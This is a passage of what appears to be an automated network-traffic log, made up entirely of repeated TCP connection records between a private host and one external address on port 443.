Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
